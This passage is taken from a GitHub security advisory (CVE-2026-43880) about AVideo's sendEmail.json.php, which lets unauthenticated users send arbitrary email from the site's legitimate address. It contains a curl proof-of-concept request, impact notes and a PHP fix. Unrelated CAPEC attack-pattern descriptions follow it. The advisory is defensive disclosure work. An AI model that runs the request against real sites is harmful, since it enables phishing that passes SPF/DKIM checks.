`contactForm=1` flow (correctly routes to the site owner):\n```bash\ncurl -b cookies.txt -s -X POST \u0027http://target.example.com/objects/sendEmail.json.php\u0027 \\\n  --data-urlencode \u0027captcha=\u003cnewcaptcha\u003e\u0027 \\\n  --data-urlencode \u0027email=attacker@attacker.com\u0027 \\\n  --data-urlencode \u0027comment=hi\u0027 \\\n  --data-urlencode \u0027contactForm=1\u0027\n# -\u003e $sendTo = site owner\u0027s contact email; $replyTo = attacker\u0027s email. (Normal contact form.)\n```\n\nOmitting `contactForm` inverts the routing and turns the endpoint into an unauthenticated sender-for-hire using the site\u0027s own From: identity.\n\n## Impact\n\n- **Phishing with the site\u0027s real sender identity.** Mail originates from the site\u0027s SMTP, so SPF/DKIM/DMARC pass; the message is indistinguishable from legitimate site communications and bypasses inbox anti-phishing heuristics.\n- **Brand impersonation / account-takeover chains.** Attacker-controlled subject (`first_name`) and body (`comment`) support credential-harvesting pages that appear to come from the site operator.\n- **Mail-reputation damage.** Repeated abuse can blacklist the site\u0027s sending IP/domain, degrading legitimate mail deliverability.\n- **Works against any AVideo instance with SMTP configured** \u2014 a default deployment after the admin configures SMTP for standard notifications. No privileged position, credentials, or non-default flags required.\n\n## Recommended Fix\n\nCollapse the endpoint to contact-owner-only behavior and require either authentication or `contactForm=1`. Minimal patch:\n\n```php\n// objects/sendEmail.json.php\n...\n$valid = Captcha::validation(@$_POST[\u0027captcha\u0027]);\nif (User::isAdmin()) {\n    $valid = true;\n}\n\n// Reject the non-contactForm branch for unauthenticated callers.\n// The \"share with a friend\" flow already requires User::isLogged()\n// in the UI (view/.../functiongetShareMenu.php), so enforce it here too.\nif (empty($_POST[\u0027contactForm\u0027]) \u0026\u0026 !User::isLogged()) {\n    $obj = new stdClass();\n    $obj-\u003eerror = __(\"Authentication required\");\n    header(\u0027Content-Type: application/json\u0027);\n    echo json_encode($obj);\n    exit;\n}\n\n$obj = new stdClass();\n$obj-\u003eerror = \u0027\u0027;\nif ($valid) {\n    ...\n    $replyTo = User::getEmail_();\n    if (empty($replyTo)) {\n        // Should no longer be reachable for arbitrary recipients.\n        // Keep as defense-in-depth only for contactForm=1 path.\n        $replyTo = $config-\u003egetContactEmail();\n    }\n    ...\n}\n```\n\nAdditional hardening:\n1. Always use a dedicated `no-reply@` address in `setFrom()`; put the caller\u0027s address only in `Reply-To`. Never reuse `$config-\u003egetContactEmail()` as the From for user-initiated messages.\n2. For the logged-in \"share\" flow, verify the caller\u0027s email has been confirmed, and rate-limit by user id and by IP.\n3. Drop the non-`contactForm` branch entirely if no legitimate unauthenticated UI caller remains.\n4. Add a visible \"user-submitted message via our site\" banner to the email body so recipients can distinguish these from first-party communications.",
  "id": "GHSA-5hgj-7gm9-cff5",
  "modified": "2026-05-13T14:20:23Z",
  "published": "2026-05-05T21:56:19Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-5hgj-7gm9-cff5"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43880"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/4e3709895857a5857f0edb46b0ee984de0d9e1a2"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AVideo: Unauthenticated Arbitrary Email Sending via sendEmail.json.php Enables Phishing from the Site\u2019s Legitimate From Address"
}

Mitigation
Architecture and Design
  • Use a mechanism that can validate the identity of the source, such as a certificate, and validate the integrity of data to ensure that it cannot be modified in transit using an Adversary-in-the-Middle (AITM) attack.
  • When designing functionality of actions in the URL scheme, consider whether the action should be accessible to all mobile applications, or if an allowlist of applications to interface with is appropriate.
CAPEC-500: WebView Injection

An adversary, through a previously installed malicious application, injects code into the context of a web page displayed by a WebView component. Through the injected code, an adversary is able to manipulate the DOM tree and cookies of the page, expose sensitive information, and can launch attacks against the web application from within the web page.

CAPEC-594: Traffic Injection

An adversary injects traffic into the target's network connection. The adversary is therefore able to degrade or disrupt the connection, and potentially modify the content. This is not a flooding attack, as the adversary is not focusing on exhausting resources. Instead, the adversary is crafting a specific input to affect the system in a particular way.

CAPEC-595: Connection Reset

In this attack pattern, an adversary injects a connection reset packet to one or both ends of a target's connection. The attacker is therefore able to have the target and/or the destination server sever the connection without having to directly filter the traffic between them.

CAPEC-596: TCP RST Injection

An adversary injects one or more TCP RST packets to a target after the target has made a HTTP GET request. The goal of this attack is to have the target and/or destination web server terminate the TCP connection.